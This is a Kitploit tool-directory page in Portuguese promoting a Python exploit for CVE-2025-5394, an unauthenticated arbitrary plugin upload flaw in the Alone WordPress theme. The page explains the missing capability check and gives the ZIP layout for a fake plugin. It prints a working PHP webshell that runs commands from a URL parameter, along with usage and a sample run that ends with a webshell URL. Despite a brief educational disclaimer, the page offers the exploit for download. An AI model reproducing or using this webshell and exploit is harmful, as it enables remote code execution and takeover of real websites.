Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Ferramentas/GitHubGitHub/nxploited/cve-2025-5394
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e Educação
GitHubnxploited/cve-2025-5394

CVE-2025-5394

Alone – Charity Multipurpose Non-profit WordPress Theme <= 7.8.3 - Falta de Autorização para Upload Arbitrário de Arquivos Não Autenticado via Instalação de Plugin

Ver Repositório
31há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

🚨 CVE-2025-5394 - Upload Arbitrário de Plugin Não Autenticado no Tema Alone

📌 Produto Afetado:

Alone – Tema WordPress Sem Fins Lucrativos e Multifuncional para Caridade   Versões: <= 7.8.3   CVE: CVE-2025-5394   Pontuação CVSS: 9.8 (Crítico)

🔥 Resumo da Vulnerabilidade:

O tema Alone para WordPress é vulnerável a uploads arbitrários de arquivos devido a uma verificação de capacidade ausente na função alone_import_pack_install_plugin().   Essa falha permite que atacantes não autenticados façam upload de arquivos ZIP (disfarçados como plugins) de locais remotos, potencialmente alcançando execução remota de código.


⚙️ Script de Exploit (Python)

Este repositório contém um script em Python que automatiza a exploração do CVE-2025-5394.   O script aciona a ação AJAX vulnerável e faz upload de um plugin falso (contendo um webshell) diretamente para o servidor WordPress.


📁 Requisitos do Webshell:

O arquivo ZIP enviado deve seguir esta estrutura:

root@kitploit:~
shell_plugin.zip
└── shell_plugin
    └── shell_plugin.php

Onde:

  • shell_plugin é o diretório do plugin.
  • shell_plugin.php é um arquivo de plugin PHP válido com um cabeçalho de plugin.
  • O arquivo PHP pode conter um payload de webshell.

Exemplo de cabeçalho mínimo de plugin dentro de shell_plugin.php:

root@kitploit:~
<?php
/*
Plugin Name: Webshell
*/
system($_GET['cmd']);
?>

🚀 Exemplo de Uso:

root@kitploit:~
python3 CVE-2025-5394.py -help
root@kitploit:~
usage: CVE-2025-5394.py [-h] -u URL -s SHELL

CVE-2025-5394 Exploit | by Khaled Alenazi (Nxploited)

options:
  -h, --help         show this help message and exit
  -u, --url URL      Target WordPress site URL
  -s, --shell SHELL  ZIP file URL containing webshell (.zip)

✅ Saída Bem-sucedida:

root@kitploit:~
python3 CVE-2025-5394.py -u http://target.com/wordpress/ -s http://target.com/shell_plugin.zip
[>] Target        : http://target.com/wordpress
[>] Shell URL     : http://target.com/shell.php
[>] Plugin Slug   : shell_plugin
[>] Sending exploit...
[+] Exploit successful
[+] Webshell URL  : http://target.com/wordpress/wp-content/plugins/shell_plugin/shell_plugin.php

⚠️ Aviso Legal:

Este script é fornecido apenas para fins educacionais e de pesquisa.   O autor não é responsável por qualquer uso indevido ou atividade ilegal realizada com este código.   Use-o apenas em sistemas que você possua ou tenha permissão explícita para testar.


👨‍💻 Por:

Nxploited ( Khaled Alenazi )   GitHub: https://github.com/Nxploited

Baixar ferramenta